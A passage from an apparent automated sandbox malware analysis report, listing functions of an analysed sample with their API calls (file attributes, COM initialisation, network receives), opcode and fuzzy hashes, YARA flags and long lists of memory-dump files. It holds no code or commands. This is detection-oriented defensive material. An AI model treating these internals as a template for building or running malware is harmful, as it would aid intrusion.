                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: 113e74dac3c6c3b8e554b26c7a21ea5fc99b817e641827d450f6e863e0c53694
                                                                                                                                              • Instruction ID: 89ab8927d71376e86b059bbf2f8f6be84b9b7a2b708907613c5cd65a3c44c102
                                                                                                                                              • Opcode Fuzzy Hash: 113e74dac3c6c3b8e554b26c7a21ea5fc99b817e641827d450f6e863e0c53694
                                                                                                                                              • Instruction Fuzzy Hash: D5C08C3802160009FD1C493846958A83346894F7AE7F83FA5ED70FB2E1DE35680F9250
                                                                                                                                              Function 00E587B0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(?,00E5DA1D,?,?,?,?), ref: 00E587B9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1716538378.0000000000E50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716556204.0000000000EB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716763609.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716834012.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716855532.0000000000EC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716873008.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716940538.0000000000EC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717449514.0000000001020000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717571841.0000000001022000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717729101.0000000001030000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718123012.0000000001031000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.000000000103C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718526093.0000000001040000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719275382.0000000001041000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719299270.0000000001042000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719318091.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719460485.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719476233.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719501305.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719754002.0000000001058000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719863677.000000000106E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719918303.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720025951.0000000001077000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720052328.0000000001080000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720079903.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720099065.00000000010AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720115148.00000000010AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720130839.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720150882.00000000010B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720166422.00000000010BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720188381.00000000010C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720203701.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720219976.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720235908.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720250464.00000000010D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720265532.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: f204d3b3a26c22159cbc1d32e0481a62727b4963cc995fea60ef2eec9e82453d
                                                                                                                                              • Instruction ID: d2832c26758f431fe7bf63ffcaec21f3bf7025a8249df819cbff96db32d9b04b
                                                                                                                                              • Opcode Fuzzy Hash: f204d3b3a26c22159cbc1d32e0481a62727b4963cc995fea60ef2eec9e82453d
                                                                                                                                              • Instruction Fuzzy Hash: D6C0803401110045F51C493856544243305990B71F3F43F69DD31FB1E1DF32D40BC690
                                                                                                                                              Function 00E5B1A0 Relevance: 1.5, APIs: 1, Instructions: 244COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E5B3C7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1716538378.0000000000E50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716556204.0000000000EB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716763609.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716834012.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716855532.0000000000EC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716873008.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716940538.0000000000EC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717449514.0000000001020000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717571841.0000000001022000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717729101.0000000001030000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718123012.0000000001031000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.000000000103C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718526093.0000000001040000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719275382.0000000001041000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719299270.0000000001042000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719318091.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719460485.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719476233.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719501305.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719754002.0000000001058000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719863677.000000000106E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719918303.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720025951.0000000001077000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720052328.0000000001080000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720079903.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720099065.00000000010AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720115148.00000000010AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720130839.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720150882.00000000010B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720166422.00000000010BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720188381.00000000010C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720203701.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720219976.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720235908.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720250464.00000000010D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720265532.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Initialize
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                              • Opcode ID: 68f5921dcd88f31092fa02b17d5518f8e32999cb47c4a60ad256186fa5c42228
                                                                                                                                              • Instruction ID: 6177537181df0e4b7693edcda232effa06e860f3477928d3c1c81a26597cde08
                                                                                                                                              • Opcode Fuzzy Hash: 68f5921dcd88f31092fa02b17d5518f8e32999cb47c4a60ad256186fa5c42228
                                                                                                                                              • Instruction Fuzzy Hash: 35B12770A10268DFEB28CF14CD94BDEB7B5EF15304F5085D9E80AA7281D775AA88CF90
                                                                                                                                              Function 05050009 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1722125500.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: D'{s
                                                                                                                                              • API String ID: 0-234340520
                                                                                                                                              • Opcode ID: e453314a0d9662b4a995be7f9909a7be3a609976784e3f30230c6a56fe06b768
                                                                                                                                              • Instruction ID: 6d39d5a2f349c3c19d49e2033964bfe38bc330160e79e7f616ae7d78d9e390cd
                                                                                                                                              • Opcode Fuzzy Hash: e453314a0d9662b4a995be7f9909a7be3a609976784e3f30230c6a56fe06b768
                                                                                                                                              • Instruction Fuzzy Hash: CF01D6BB04C210BE6552D9817B685BF3B6FE5D7330B30806AFC4797641E1644A556171
                                                                                                                                              Function 0505001B Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1722125500.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: D'{s
                                                                                                                                              • API String ID: 0-234340520
                                                                                                                                              • Opcode ID: 3adac9a1269a1f4fda62b77e45bb84e2f6e348b8f348b20ac46a7a469ec7458c
                                                                                                                                              • Instruction ID: ebf59803bab20826306e3ed13046ae17018e214b38ce5801b5ce72c0a87da34f
                                                                                                                                              • Opcode Fuzzy Hash: 3adac9a1269a1f4fda62b77e45bb84e2f6e348b8f348b20ac46a7a469ec7458c
                                                                                                                                              • Instruction Fuzzy Hash: 4401F7AB04C220BE6513D5417B3C9BF3B6FE5D7331B30802AFC4793601F1A54A54A132
                                                                                                                                              Function 05050074 Relevance: .1, Instructions: 76COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1722125500.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a959bf6c336dbd4ea894fc4e3af55e35e20944f8dcb9864f6e7a4f1984348ee1
                                                                                                                                              • Instruction ID: 2aa0087fbddf83870e5e6292f9bd8c40ad2f849a4b41f56b7872b266643200ee
                                                                                                                                              • Opcode Fuzzy Hash: a959bf6c336dbd4ea894fc4e3af55e35e20944f8dcb9864f6e7a4f1984348ee1
                                                                                                                                              • Instruction Fuzzy Hash: 330126AB01C254FDA613DA61773D5FF3F2BE983330B308567FC8395112A1550A59A632
                                                                                                                                              Function 05050050 Relevance: .0, Instructions: 48COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1722125500.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2d0b50587f9f9c86d94394049594324b48d6b3b9d1985adffd333e066dcf4871
                                                                                                                                              • Instruction ID: 633070d1fef34b1952e07e86da6a90b212679188ab11b5dea6fca3cdf2a61638
                                                                                                                                              • Opcode Fuzzy Hash: 2d0b50587f9f9c86d94394049594324b48d6b3b9d1985adffd333e066dcf4871
                                                                                                                                              • Instruction Fuzzy Hash: 07F0BEAB05C210FE9653A981773D6FF7B6BBB93330B309012FC4724501B1A54754A222
                                                                                                                                              Function 0505005F Relevance: .0, Instructions: 45COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1722125500.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3cb0ef477f3ba1dc3cf76a2d01b74a3dd3bca42d30d55548eca862b72fc48dba
                                                                                                                                              • Instruction ID: 8f1121e2774ac7413f18bb8a4f9f2b50936b075565ba2547d4b44bf7984da76a
                                                                                                                                              • Opcode Fuzzy Hash: 3cb0ef477f3ba1dc3cf76a2d01b74a3dd3bca42d30d55548eca862b72fc48dba
                                                                                                                                              • Instruction Fuzzy Hash: 38F020EB06C200FE9113A992737C6BF3BABB693330B309022BC4360A01B0940784A232
                                                                                                                                              Function 0505009F Relevance: .0, Instructions: 37COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1722125500.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 01583a5cd164d3d5c37f7c8ce59a198b8029344bd77d4091fa93bb59e34ed9df
                                                                                                                                              • Instruction ID: 81f91ae494cc697fcf3d6c7822457da8dca78d74d1f1689ee34293ac7b6f8590
                                                                                                                                              • Opcode Fuzzy Hash: 01583a5cd164d3d5c37f7c8ce59a198b8029344bd77d4091fa93bb59e34ed9df
                                                                                                                                              • Instruction Fuzzy Hash: 46F05C7704C2119FC213E16125AD17F7F57BA03330378426EB44357A83D1064368A232

                                                                                                                                              Non-executed Functions

                                                                                                                                              Function 00E931A8 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1716538378.0000000000E50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716556204.0000000000EB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716763609.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716834012.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716855532.0000000000EC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716873008.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716940538.0000000000EC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717449514.0000000001020000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717571841.0000000001022000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717729101.0000000001030000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718123012.0000000001031000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.000000000103C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718526093.0000000001040000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719275382.0000000001041000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719299270.0000000001042000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719318091.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719460485.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719476233.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719501305.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719754002.0000000001058000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719863677.000000000106E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719918303.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720025951.0000000001077000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720052328.0000000001080000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720079903.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720099065.00000000010AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720115148.00000000010AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720130839.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720150882.00000000010B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720166422.00000000010BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720188381.00000000010C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720203701.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720219976.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720235908.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720250464.00000000010D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720265532.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                              • Opcode ID: 131f91755854517cd6437e25475a90cb277ba81877931b2a99b088e85ca796fb
                                                                                                                                              • Instruction ID: f5893bbd0deb65e6613e01012e16ac692bffd1be1ecfb3bf05ef86c3fa63dfdc
                                                                                                                                              • Opcode Fuzzy Hash: 131f91755854517cd6437e25475a90cb277ba81877931b2a99b088e85ca796fb
                                                                                                                                              • Instruction Fuzzy Hash: 58C217B1E046288BDF25CE28DD40BEAB7B5EB48305F1551EAD84DF7281E775AE818F40
                                                                                                                                              Function 00E5E0C0 Relevance: 4.6, APIs: 3, Instructions: 102networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • recv.WS2_32(?,?,00000004,00000000), ref: 00E5E10B
                                                                                                                                              • recv.WS2_32(?,?,00000008,00000000), ref: 00E5E140
                                                                                                                                              Memory Dump Source
